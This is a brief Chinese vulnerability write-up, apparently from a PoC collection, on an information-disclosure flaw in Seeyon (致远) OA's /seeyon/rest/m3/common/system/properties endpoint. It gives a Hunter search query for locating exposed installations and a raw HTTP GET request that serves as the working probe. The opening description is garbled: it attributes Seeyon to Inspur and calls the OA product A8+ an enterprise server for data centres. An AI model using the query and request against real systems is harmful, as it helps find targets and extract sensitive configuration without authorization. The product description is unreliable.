致远OA properties接口存在敏感信息泄露漏洞
一、漏洞简介
<font style="color:rgba(0, 0, 0, 0.9);">致远A8+是中国致远信息技术股份有限公司(Inspur)开发的一款企业级服务器产品。作为致远公司的旗舰机型,A8+可提供高性能、可靠性和可扩展性,适用于各种企业级应用和数据中心环境。致远A8+全版本properties接口存在敏感信息泄露漏洞。</font>
二、影响版本
- 致远OA
三、资产测绘
- hunter
app.name="致远 OA" - 特征
四、漏洞复现
GET /seeyon/rest/m3/common/system/properties HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive